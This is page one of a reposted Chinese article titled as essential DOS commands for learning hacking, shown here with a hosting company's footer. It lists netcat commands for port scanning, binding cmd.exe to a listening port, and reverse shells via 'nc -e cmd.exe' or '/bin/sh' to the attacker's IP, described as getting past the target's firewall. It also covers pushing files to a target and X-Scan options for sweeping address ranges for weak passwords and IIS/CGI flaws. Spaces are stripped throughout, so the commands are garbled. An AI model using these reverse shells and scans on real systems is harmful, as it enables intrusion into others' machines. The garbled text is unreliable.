学习黑客必须要掌握的DOS命令全集第1/2页
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
| 将更详细 -w数字timeout延时间隔 -z将输入,输出关掉(用于扫锚时) 基本用法: nc-nvv192.168.0.180连接到192.168.0.1主机的80端口 nc-l-p80开启本机的TCP80端口并监听 nc-nvv-w2-z192.168.0.180-1024扫锚192.168.0.1的80-1024端口 nc-l-p5354-t-ec:winntsystem32cmd.exe绑定remote主机的cmdshell在 remote的TCP5354端口 nc-t-ec:winntsystem32cmd.exe192.168.0.25354梆定remote主机的 cmdshell并反向连接192.168.0.2的5354端口 高级用法: nc-L-p80作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止 nc-L-p80>c:\log.txt作为蜜罐用2:开启并不停地监听80端口,直到 CTR+C,同时把结果输出到c:\log.txt nc-L-p80<c:\honeyport.txt作为蜜罐用3-1:开启并不停地监听80端口, 直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 type.exec:\honeyport|nc-L-p80作为蜜罐用3-2:开启并不停地监听80端 口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用 本机上用:nc-l-p本机端口 在对方主机上用:nc-ecmd.exe本机IP-p本机端口*win2K nc-e/bin/sh本机IP-p本机端口*linux,unix反向连接突破对方主机的防火墙 本机上用:nc-d-l-p本机端口<要传送的文件路径及名称 在对方主机上用:nc-vv本机IP本机端口>存放文件的路径及名称传送文件 到对方主机 备注: |管道命令 <或>重定向命令。“<”,例如:tlntadmn<test.txt指把test.txt的内容 赋值给tlntadmn命令 @表示执行@后面的命令,但不会显示出来(后台执行);例:@dirc:\winnt >>d:\log.txt意思是:后台执行dir,并把结果存在d:\log.txt中 >与>>的区别 ">"指:覆盖;">>"指:保存到(添加到)。 如:@dirc:\winnt>>d:\log.txt和@dirc:\winnt>d:\log.txt二个命令分别 执行二次比较看:用>>的则是把二次的结果都保存了,而用:>则只有一次的结果 ,是因为第二次的结果把第一次的覆盖了。 2、扫锚工具:xscan.exe 基本格式 xscan-host<起始IP>[-<终止IP>]<检测项目>[其他选项]扫锚"起始IP到终止 IP"段的所有主机信息 xscan-file<主机列表文件名><检测项目>[其他选项]扫锚"主机IP列表文件 名"中的所有主机信息 检测项目 -active检测主机是否存活 -os检测远程操作系统类型(通过NETBIOS和SNMP协议) -port检测常用服务的端口状态 -ftp检测FTP弱口令 -pub检测FTP服务匿名用户写权限 -pop3检测POP3-Server弱口令 -smtp检测SMTP-Server漏洞 -sql检测SQL-Server弱口令 -smb检测NT-Server弱口令 -iis检测IIS编码/解码漏洞 -cgi检测CGI漏洞 -nasl加载Nessus攻击脚本 -all检测以上所有项目 其它选项 -i适配器编号设置网络适配器,<适配器编号>可通过"-l"参数获取 -l显示所有网络适配器 -v显示详细扫描进度 -p跳过没有响应的主机 -o跳过没有检测到开放端口的主机 -t并发线程数量,并发主机数量指定最大并发线程数量和并发主机数量,默 认数量为100,10 -log文件名指定扫描报告文件名(后缀为:TXT或HTML格式的文件) 用法示例 xscan-host192.168.1.1-192.168.255.255-all-active-p 检测 192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机 xscan-host192.168.1.1-192.168.255.255-port-smb-t150-o检测 192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大 并发线程数量为150,跳过没有检测到开放端口的主机 xscan-filehostlist.txt-port-cgi-t200,5-v-o检测“hostlist.txt” 文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同 一时刻最多检测5台主机,显示详细检测进度,跳过没 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: Dos下终止进程的方法下一篇: 用DOS批处理实现建立文件夹的代码
关于学习黑客必须要掌握的DOS命令全集第1/2页的所有评论
